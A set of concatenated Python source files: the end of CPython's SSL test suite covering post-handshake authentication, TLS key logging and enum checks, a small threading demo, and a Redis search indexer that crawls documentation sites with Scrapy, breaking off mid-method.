ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.post_handshake_auth = True
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
self.assertEqual(ctx.post_handshake_auth, True)
def test_pha_required(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA method just returns true when cert is already available
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'GETCERT')
cert_text = s.recv(4096).decode('us-ascii')
self.assertIn('Python Software Foundation CA', cert_text)
def test_pha_required_nocert(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
def msg_cb(conn, direction, version, content_type, msg_type, data):
if support.verbose and content_type == _TLSContentType.ALERT:
info = (conn, direction, version, content_type, msg_type, data)
sys.stdout.write(f"TLS: {info!r}\n")
server_context._msg_callback = msg_cb
client_context._msg_callback = msg_cb
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname,
suppress_ragged_eofs=False) as s:
s.connect((HOST, server.port))
s.write(b'PHA')
# test sometimes fails with EOF error. Test passes as long as
# server aborts connection with an error.
with self.assertRaisesRegex(
ssl.SSLError,
'(certificate required|EOF occurred)'
):
# receive CertificateRequest
data = s.recv(1024)
self.assertEqual(data, b'OK\n')
# send empty Certificate + Finish
s.write(b'HASCERT')
# receive alert
s.recv(1024)
def test_pha_optional(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# check CERT_OPTIONAL
server_context.verify_mode = ssl.CERT_OPTIONAL
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_optional_nocert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_OPTIONAL
client_context.post_handshake_auth = True
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
# optional doesn't fail when client does not have a cert
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
def test_pha_no_pha_client(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with self.assertRaisesRegex(ssl.SSLError, 'not server'):
s.verify_client_post_handshake()
s.write(b'PHA')
self.assertIn(b'extension not received', s.recv(1024))
def test_pha_no_pha_server(self):
# server doesn't have PHA enabled, cert is requested in handshake
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA doesn't fail if there is already a cert
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_not_tls13(self):
# TLS 1.2
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# PHA fails for TLS != 1.3
s.write(b'PHA')
self.assertIn(b'WRONG_SSL_VERSION', s.recv(1024))
def test_bpo37428_pha_cert_none(self):
# verify that post_handshake_auth does not implicitly enable cert
# validation.
hostname = SIGNED_CERTFILE_HOSTNAME
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# no cert validation and CA on client side
client_context.check_hostname = False
client_context.verify_mode = ssl.CERT_NONE
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
server_context.load_verify_locations(SIGNING_CA)
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# server cert has not been validated
self.assertEqual(s.getpeercert(), {})
def test_internal_chain_client(self):
client_context, server_context, hostname = testing_context(
server_chain=False
)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname
) as s:
s.connect((HOST, server.port))
vc = s._sslobj.get_verified_chain()
self.assertEqual(len(vc), 2)
ee, ca = vc
uvc = s._sslobj.get_unverified_chain()
self.assertEqual(len(uvc), 1)
self.assertEqual(ee, uvc[0])
self.assertEqual(hash(ee), hash(uvc[0]))
self.assertEqual(repr(ee), repr(uvc[0]))
self.assertNotEqual(ee, ca)
self.assertNotEqual(hash(ee), hash(ca))
self.assertNotEqual(repr(ee), repr(ca))
self.assertNotEqual(ee.get_info(), ca.get_info())
self.assertIn("CN=localhost", repr(ee))
self.assertIn("CN=our-ca-server", repr(ca))
pem = ee.public_bytes(_ssl.ENCODING_PEM)
der = ee.public_bytes(_ssl.ENCODING_DER)
self.assertIsInstance(pem, str)
self.assertIn("-----BEGIN CERTIFICATE-----", pem)
self.assertIsInstance(der, bytes)
self.assertEqual(
ssl.PEM_cert_to_DER_cert(pem), der
)
def test_internal_chain_server(self):
client_context, server_context, hostname = testing_context()
client_context.load_cert_chain(SIGNED_CERTFILE)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname
) as s:
s.connect((HOST, server.port))
s.write(b'VERIFIEDCHAIN\n')
res = s.recv(1024)
self.assertEqual(res, b'\x02\n')
s.write(b'UNVERIFIEDCHAIN\n')
res = s.recv(1024)
self.assertEqual(res, b'\x02\n')
HAS_KEYLOG = hasattr(ssl.SSLContext, 'keylog_filename')
requires_keylog = unittest.skipUnless(
HAS_KEYLOG, 'test requires OpenSSL 1.1.1 with keylog callback')
class TestSSLDebug(unittest.TestCase):
def keylog_lines(self, fname=os_helper.TESTFN):
with open(fname) as f:
return len(list(f))
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_defaults(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
self.assertFalse(os.path.isfile(os_helper.TESTFN))
ctx.keylog_filename = os_helper.TESTFN
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
self.assertTrue(os.path.isfile(os_helper.TESTFN))
self.assertEqual(self.keylog_lines(), 1)
ctx.keylog_filename = None
self.assertEqual(ctx.keylog_filename, None)
with self.assertRaises((IsADirectoryError, PermissionError)):
# Windows raises PermissionError
ctx.keylog_filename = os.path.dirname(
os.path.abspath(os_helper.TESTFN))
with self.assertRaises(TypeError):
ctx.keylog_filename = 1
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_filename(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
client_context, server_context, hostname = testing_context()
client_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# header, 5 lines for TLS 1.3
self.assertEqual(self.keylog_lines(), 6)
client_context.keylog_filename = None
server_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 11)
client_context.keylog_filename = os_helper.TESTFN
server_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 21)
client_context.keylog_filename = None
server_context.keylog_filename = None
@requires_keylog
@unittest.skipIf(sys.flags.ignore_environment,
"test is not compatible with ignore_environment")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_env(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with unittest.mock.patch.dict(os.environ):
os.environ['SSLKEYLOGFILE'] = os_helper.TESTFN
self.assertEqual(os.environ['SSLKEYLOGFILE'], os_helper.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
ctx = ssl.create_default_context()
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
def test_msg_callback(self):
client_context, server_context, hostname = testing_context()
def msg_cb(conn, direction, version, content_type, msg_type, data):
pass
self.assertIs(client_context._msg_callback, None)
client_context._msg_callback = msg_cb
self.assertIs(client_context._msg_callback, msg_cb)
with self.assertRaises(TypeError):
client_context._msg_callback = object()
def test_msg_callback_tls12(self):
client_context, server_context, hostname = testing_context()
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
msg = []
def msg_cb(conn, direction, version, content_type, msg_type, data):
self.assertIsInstance(conn, ssl.SSLSocket)
self.assertIsInstance(data, bytes)
self.assertIn(direction, {'read', 'write'})
msg.append((direction, version, content_type, msg_type))
client_context._msg_callback = msg_cb
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn(
("read", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
_TLSMessageType.SERVER_KEY_EXCHANGE),
msg
)
self.assertIn(
("write", TLSVersion.TLSv1_2, _TLSContentType.CHANGE_CIPHER_SPEC,
_TLSMessageType.CHANGE_CIPHER_SPEC),
msg
)
def test_msg_callback_deadlock_bpo43577(self):
client_context, server_context, hostname = testing_context()
server_context2 = testing_context()[1]
def msg_cb(conn, direction, version, content_type, msg_type, data):
pass
def sni_cb(sock, servername, ctx):
sock.context = server_context2
server_context._msg_callback = msg_cb
server_context.sni_callback = sni_cb
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
class TestEnumerations(unittest.TestCase):
def test_tlsversion(self):
class CheckedTLSVersion(enum.IntEnum):
MINIMUM_SUPPORTED = _ssl.PROTO_MINIMUM_SUPPORTED
SSLv3 = _ssl.PROTO_SSLv3
TLSv1 = _ssl.PROTO_TLSv1
TLSv1_1 = _ssl.PROTO_TLSv1_1
TLSv1_2 = _ssl.PROTO_TLSv1_2
TLSv1_3 = _ssl.PROTO_TLSv1_3
MAXIMUM_SUPPORTED = _ssl.PROTO_MAXIMUM_SUPPORTED
enum._test_simple_enum(CheckedTLSVersion, TLSVersion)
def test_tlscontenttype(self):
class Checked_TLSContentType(enum.IntEnum):
"""Content types (record layer)
See RFC 8446, section B.1
"""
CHANGE_CIPHER_SPEC = 20
ALERT = 21
HANDSHAKE = 22
APPLICATION_DATA = 23
# pseudo content types
HEADER = 0x100
INNER_CONTENT_TYPE = 0x101
enum._test_simple_enum(Checked_TLSContentType, _TLSContentType)
def test_tlsalerttype(self):
class Checked_TLSAlertType(enum.IntEnum):
"""Alert types for TLSContentType.ALERT messages
See RFC 8466, section B.2
"""
CLOSE_NOTIFY = 0
UNEXPECTED_MESSAGE = 10
BAD_RECORD_MAC = 20
DECRYPTION_FAILED = 21
RECORD_OVERFLOW = 22
DECOMPRESSION_FAILURE = 30
HANDSHAKE_FAILURE = 40
NO_CERTIFICATE = 41
BAD_CERTIFICATE = 42
UNSUPPORTED_CERTIFICATE = 43
CERTIFICATE_REVOKED = 44
CERTIFICATE_EXPIRED = 45
CERTIFICATE_UNKNOWN = 46
ILLEGAL_PARAMETER = 47
UNKNOWN_CA = 48
ACCESS_DENIED = 49
DECODE_ERROR = 50
DECRYPT_ERROR = 51
EXPORT_RESTRICTION = 60
PROTOCOL_VERSION = 70
INSUFFICIENT_SECURITY = 71
INTERNAL_ERROR = 80
INAPPROPRIATE_FALLBACK = 86
USER_CANCELED = 90
NO_RENEGOTIATION = 100
MISSING_EXTENSION = 109
UNSUPPORTED_EXTENSION = 110
CERTIFICATE_UNOBTAINABLE = 111
UNRECOGNIZED_NAME = 112
BAD_CERTIFICATE_STATUS_RESPONSE = 113
BAD_CERTIFICATE_HASH_VALUE = 114
UNKNOWN_PSK_IDENTITY = 115
CERTIFICATE_REQUIRED = 116
NO_APPLICATION_PROTOCOL = 120
enum._test_simple_enum(Checked_TLSAlertType, _TLSAlertType)
def test_tlsmessagetype(self):
class Checked_TLSMessageType(enum.IntEnum):
"""Message types (handshake protocol)
See RFC 8446, section B.3
"""
HELLO_REQUEST = 0
CLIENT_HELLO = 1
SERVER_HELLO = 2
HELLO_VERIFY_REQUEST = 3
NEWSESSION_TICKET = 4
END_OF_EARLY_DATA = 5
HELLO_RETRY_REQUEST = 6
ENCRYPTED_EXTENSIONS = 8
CERTIFICATE = 11
SERVER_KEY_EXCHANGE = 12
CERTIFICATE_REQUEST = 13
SERVER_DONE = 14
CERTIFICATE_VERIFY = 15
CLIENT_KEY_EXCHANGE = 16
FINISHED = 20
CERTIFICATE_URL = 21
CERTIFICATE_STATUS = 22
SUPPLEMENTAL_DATA = 23
KEY_UPDATE = 24
NEXT_PROTO = 67
MESSAGE_HASH = 254
CHANGE_CIPHER_SPEC = 0x0101
enum._test_simple_enum(Checked_TLSMessageType, _TLSMessageType)
def test_sslmethod(self):
Checked_SSLMethod = enum._old_convert_(
enum.IntEnum, '_SSLMethod', 'ssl',
lambda name: name.startswith('PROTOCOL_') and name != 'PROTOCOL_SSLv23',
source=ssl._ssl,
)
enum._test_simple_enum(Checked_SSLMethod, ssl._SSLMethod)
def test_options(self):
CheckedOptions = enum._old_convert_(
enum.FlagEnum, 'Options', 'ssl',
lambda name: name.startswith('OP_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedOptions, ssl.Options)
def test_alertdescription(self):
CheckedAlertDescription = enum._old_convert_(
enum.IntEnum, 'AlertDescription', 'ssl',
lambda name: name.startswith('ALERT_DESCRIPTION_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedAlertDescription, ssl.AlertDescription)
def test_sslerrornumber(self):
Checked_SSLMethod = enum._old_convert_(
enum.IntEnum, '_SSLMethod', 'ssl',
lambda name: name.startswith('PROTOCOL_') and name != 'PROTOCOL_SSLv23',
source=ssl._ssl,
)
enum._test_simple_enum(Checked_SSLMethod, ssl._SSLMethod)
def test_verifyflags(self):
CheckedVerifyFlags = enum._old_convert_(
enum.FlagEnum, 'VerifyFlags', 'ssl',
lambda name: name.startswith('VERIFY_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedVerifyFlags, ssl.VerifyFlags)
def test_verifymode(self):
CheckedVerifyMode = enum._old_convert_(
enum.IntEnum, 'VerifyMode', 'ssl',
lambda name: name.startswith('CERT_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedVerifyMode, ssl.VerifyMode)
def test_main(verbose=False):
if support.verbose:
plats = {
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SSLObjectTests, SimpleBackgroundTests, ThreadedTests,
TestPostHandshakeAuth, TestSSLDebug
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
thread_info = threading_helper.threading_setup()
try:
support.run_unittest(*tests)
finally:
threading_helper.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
05_py_thread_id.py
|
""" py thread id """
import threading
def do_it() -> None:
print("did it")
print(threading.get_ident())
print(threading.current_thread().name)
thread1 = threading.Thread(target=do_it, name="thread1")
thread1.start();
thread2 = threading.Thread(target=do_it, name="thread2")
thread2.start();
thread1.join();
thread2.join();
print(threading.get_ident())
print(threading.current_thread().name)
|
indexer.py
|
import datetime
import json
import hashlib
import logging
import multiprocessing
import time
from dataclasses import asdict
from queue import Queue
from threading import Thread
from typing import Dict, List, Callable, Set
from redis import ResponseError
import redis.exceptions
from redisearch.query import Query
import scrapy
from bs4 import BeautifulSoup, element
from redisearch import Client, IndexDefinition
from scrapy import signals
from scrapy.linkextractors import LinkExtractor
from scrapy.crawler import CrawlerProcess
from scrapy.signalmanager import dispatcher
from sitesearch.keys import Keys
from sitesearch.config import AppConfiguration
from sitesearch.connections import get_search_connection
from sitesearch.errors import ParseError
from sitesearch.models import SearchDocument, SiteConfiguration, TYPE_PAGE, TYPE_SECTION
from sitesearch.query_parser import TokenEscaper
ROOT_PAGE = "Redis Labs Documentation"
MAX_THREADS = multiprocessing.cpu_count() * 5
DEBOUNCE_SECONDS = 60 * 5 # Five minutes
SYNUPDATE_COMMAND = 'FT.SYNUPDATE'
TWO_HOURS = 60*60*2
INDEXING_LOCK_TIMEOUT = 60*60
SECTION_ID = "{url}:section:{hash}"
PAGE_ID = "{url}:page:{hash}"
Scorer = Callable[[SearchDocument, float], None]
ScorerList = List[Scorer]
Extractor = Callable[[str], List[str]]
Validator = Callable[[SearchDocument], None]
ValidatorList = List[Validator]
log = logging.getLogger(__name__)
def md5(string: str):
"""Return an md5 digest for an input string."""
return hashlib.md5(string.encode("utf-8")).hexdigest()
def page_id(url: str, body: str, title: str) -> str:
"""
Return the document ID for a page document.
We hash the body text and title of the page to help detect stale
page documents after indexing is complete.
"""
doc_hash = md5("".join([body, title]))
return PAGE_ID.format(url=url, hash=doc_hash)
def section_id(url: str, pos: int, body: str, page_title: str, part_title: str) -> str:
"""
Return the hash of a section document.
We hash the body, title, and position of the section to help
detect stale section documents after indexing is complete.
"""
doc_hash = md5("".join([body, part_title, page_title, str(pos)]))
return SECTION_ID.format(url=url, hash=doc_hash)
class DebounceError(Exception):
"""The indexing debounce threshold was not met"""
def next_element(elem):
"""Get sibling elements until we exhaust them."""
while elem is not None:
elem = elem.next_sibling
if hasattr(elem, 'name'):
return elem
def get_section(root_url: str, url: str) -> str:
"""Given a root URL and an input URL, determine the "section" of the current URL.
The section is the first portion of the path above the root, e.g. in the URL:
https://docs.redislabs.com/first/second/third
The section is "first".
"""
if not url.startswith(root_url):
return ""
try:
url_parts = url.replace(root_url, "").replace("//", "/").split("/")
s = [u for u in url_parts if u][0]
except (IndexError, TypeError, AttributeError) as e:
log.debug("Could not parse section: %s", e)
s = ""
return s
class DocumentParser:
def __init__(self, site_config: SiteConfiguration):
self.root_url = site_config.url
self.validators = site_config.validators
self.content_classes = site_config.content_classes
self.escaper = TokenEscaper(site_config.literal_terms)
def prepare_text(self, text: str, strip_symbols: bool = False) -> str:
base = text.strip().strip("\n").replace("\n", " ")
if strip_symbols:
base = base.replace("#", " ")
return self.escaper.escape(base)
def extract_parts(self, doc,
h2s: List[element.Tag]) -> List[SearchDocument]:
"""
Extract SearchDocuments from H2 elements in a SearchDocument.
Given a list of H2 elements in a page, we extract the HTML content for
that "part" of the page by grabbing all of the sibling elements and
converting them to text.
"""
docs = []
for i, tag in enumerate(h2s):
origin = tag
# Sometimes we stick the title in as a link...
if tag and tag.string is None:
tag = tag.find("a")
part_title = tag.get_text() if tag else ""
page = []
elem = next_element(origin)
while elem and elem.name != 'h2':
page.append(str(elem))
elem = next_element(elem)
part_title = self.prepare_text(part_title)
body = self.prepare_text(
BeautifulSoup('\n'.join(page), 'html.parser').get_text())
doc_id = section_id(doc.url, i, body, doc.title, part_title)
docs.append(
SearchDocument(doc_id=doc_id,
title=doc.title,
hierarchy=doc.hierarchy,
s=doc.s,
section_title=part_title or "",
body=body,
url=doc.url,
type=TYPE_SECTION,
position=i))
return docs
def prepare_document(self, url: str, html: str) -> List[SearchDocument]:
"""
Break an HTML string up into a list of SearchDocuments.
If the document has any H2 elements, it is broken up into
sub-documents, one per H2, in addition to a 'page' document
that we index with the entire content of the page.
"""
docs = []
soup = BeautifulSoup(html, 'html.parser')
content = soup
safe_url = url.split('?')[0].rstrip('/')
try:
title = self.prepare_text(soup.title.string.split("|")[0], True)
except AttributeError as e:
raise ParseError("Failed -- missing title") from e
# Use the first content class we find on the page. (i.e., main
# page content).
if self.content_classes:
for content_class in self.content_classes:
main_content = soup.select(content_class)
if main_content:
content = main_content[0]
break
s = get_section(self.root_url, url)
h2s = content.find_all('h2')
# Some pages use h3s for section titles...
if not h2s:
h2s = content.find_all('h3')
body = self.prepare_text(content.get_text(), True)
doc_id = page_id(safe_url, body, title)
doc = SearchDocument(doc_id=doc_id,
title=title,
section_title="",
hierarchy=[],
s=s,
body=body,
url=safe_url,
type=TYPE_PAGE)
# Index the entire document
docs.append(doc)
# If there are headers, break up the document and index each header
# as a separate document.
if h2s:
docs += self.extract_parts(doc, h2s)
return docs
def parse(self, url, html):
docs_for_page = self.prepare_document(url, html)
for doc in docs_for_page:
self.validate(doc)
return docs_for_page
def validate(self, doc: SearchDocument):
for v in self.validators:
v(doc)
class DocumentationSpiderBase(scrapy.Spider):
"""
A base class for spiders. Each base class should define the `url`
class attribute, or else Scrapy won't spider anything.
This can be done programmatically:
RedisDocsSpider = type(
'RedisDocsSpider',
(DocumentationSpiderBase,), {"site_config": docs_site_config})
If `site_config.validators` is defined, the indexer will call each
validator function for every `SearchDocument` that this scraper
produces before indexing it.
If `site_config.allow` or `site_config.deny` are defined, this
scraper will send them in as arguments to LinkExtractor when
extracting links on a page, allowing fine-grained control of URL
patterns to exclude or allow.
"""
name: str = "documentation"
doc_parser_class = DocumentParser
# Sub-classes should override these fields.
url: str = None
site_config: SiteConfiguration
def __init__(self, *args, **kwargs):
self.url = self.site_config.url
self.doc_parser = self.doc_parser_class(self.site_config)
super().__init__(*args, **kwargs)
self.extractor = LinkExtractor(allow=self.site_config.allow,
deny=self.site_config.deny)
def follow_links(self, response):
try:
links = [
l for l in self.extractor.extract_links(response)
if l.url.startswith(self.url)
]
except AttributeError: # Usually means this page isn't text -- could be a a PDF, etc.
links = []
yield from response.follow_all(links, callback=self.parse)
def parse(self, response, **kwargs):
docs_for_page = []
if not response.url.startswith(self.url):
return
try:
docs_for_page = self.doc_parser.parse(response.url, response.body)
except ParseError as e:
log.error("Document parser error -- %s: %s", e, response.url)
else:
for doc in docs_for_page:
yield doc
yield from self.follow_links(response)
@property
def start_urls(self):
return [self.url]
class Indexer:
"""
Indexer crawls a web site specified in a SiteConfiguration and
indexes it in RediSearch.
Some notes on how we use search index aliases:
When we create an index, the index name we use is the site's
specified index name combined with the current time as a UNIX
timestamp.
Later, when indexing the site actually completes, we'll use the
site's specified index name as an alias. We'll delete any existing
aliases (from past indexing runs) as well as indexes from past
indexing jobs.
Whenever we try to search the index, we'll refer to the alias --
not the actual index name.
"""
def __init__(self,
site: SiteConfiguration,
app_config: AppConfiguration,
search_client: Client = None):
self.site = site
self.keys = Keys(app_config.key_prefix)
self.index_alias = self.keys.index_alias(self.site.url)
self.index_name = f"{self.index_alias}-{time.time()}"
self.escaper = TokenEscaper(site.literal_terms)
if search_client is None:
search_client = get_search_connection(self.index_name)
self.search_client = search_client
self.redis = self.search_client.redis
self.lock = self.keys.index_lock(site.url)
index_exists = self.search_index_exists()
if not index_exists:
self.setup_index()
# This is a map of already-crawled URLs to page titles, which we can
# use to construct a hierarchy for a given document by comparing each
# segment of its URL to known URLs.
self.seen_urls: Dict[str, str] = {}
# This is the set of all known document IDs. We'll use this to remove
# outdated documents from the index.
self.seen_ids: Set[str] = set()
@property
def url(self):
return self.site.url
def document_to_dict(self, document: SearchDocument):
"""
Given a SearchDocument, return a dictionary of the fields to index,
and options like the ad-hoc score.
Every callable in "scorers" is given a chance to influence the ad-hoc
score of the document.
At query time, RediSearch will multiply the ad-hoc score by the TF*IDF
score of a document to produce the final score.
"""
score = 1.0
for scorer in self.site.scorers:
score = scorer(document, score)
doc = asdict(document)
doc['__score'] = score
hierarchy = self.build_hierarchy(document)
doc['hierarchy'] = json.dumps(hierarchy)
return doc
def index_document(self, doc: SearchDocument):
"""
Add a document to the search index.
This is the moment we convert a SearchDocument into a Python
dictionary and send it to RediSearch.
"""
key = self.keys.document(self.site.url, doc.doc_id)
try:
self.redis.hset(key, mapping=self.document_to_dict(doc))
except redis.exceptions.DataError as e:
log.error("Failed -- bad data: %s, %s", e, doc.url)
except redis.exceptions.ResponseError as e:
log.error("Failed -- response error: %s, %s", e, doc.url)
new_urls_key = self.keys.site_urls_new(self.index_alias)
self.redis.sadd(new_urls_key, doc.url)
def add_synonyms(self):
for synonym_group in self.site.synonym_groups:
return self.redis.execute_command(SYNUPDATE_COMMAND,
self.index_name,
synonym_group.group_id,
*synonym_group.synonyms)
def search_index_exists(self):
try:
self.search_client.info()
except redis.exceptions.ResponseError:
return False
else:
return True
def setup_index(self):
"""
Create the index definition and schema.
If the indexer was given any synonym groups, it adds these
to RediSearch after creating the index.
"""
definition = IndexDefinition(prefix=[self.keys.index_prefix(self.url)])
self.search_client.create_index(self.site.search_schema,
definition=definition)
if self.site.synonym_groups:
self.add_synonyms()
def debounce(self):
last_index = self.redis.get(self.keys.last_index(self.site.url))
if last_index:
now = datetime.datetime.now().timestamp()
time_diff = now - float(last_index)
if time_diff > DEBOUNCE_SECONDS:
raise DebounceError(f"Debounced indexing after {time_diff}s")
def clear_old_indexes(self):
old_indexes = [
i for i in self.redis.execute_command('FT._LIST')
if i.startswith(self.index_alias) and i != self.index_name
]
log.debug("Dropping old indexes: %s", ", ".join(old_indexes))
for idx in old_indexes:
self.redis.execute_command('FT.DROPINDEX', idx)
def clear_old_hashes(self):
"""
Delete any stale Hashes from the index.
Stale Hashes are those whose document IDs exist in the search index but
not in the latest set of seen IDs after scraping a site.
Every document ID includes both the URL of the page it came from and a
hash of the page's or section's content. When the content of a page or
section we're tracking in the index changes on the site, we'll get a new
document ID. Because the ID will differ from the one we've already seen,
the old document will show up as stale, and we can delete it.
"""
all_hash_ids = set()
offset = 0
iter_by = 200
# Get the set of all Hash IDs that this index knows about.
while True:
q = Query("*").paging(offset, iter_by).return_fields("doc_id")
existing_docs = self.search_client.search(q).docs
if not existing_docs: # No more documents
break
all_hash_ids |= {getattr(d, 'doc_id', None) for d in existing_docs}
offset += iter_by
stale_ids = all_hash_ids - self.seen_ids
stale_ids.discard(None)
log.warning("Deleting stale IDs: %s", stale_ids)
# Remove the stale Hashes.
if stale_ids:
keys = [self.keys.document(self.url, id) for id in stale_ids]
self.redis.delete(*keys)
def create_index_alias(self):
"""
Switch the current alias to point to the new index and delete old indexes.
If the alias doesn't exist yet, this method will create it.
"""
try:
self.search_client.aliasupdate(self.index_alias)
except ResponseError:
log.error("Alias %s for index %s did not exist, creating.",
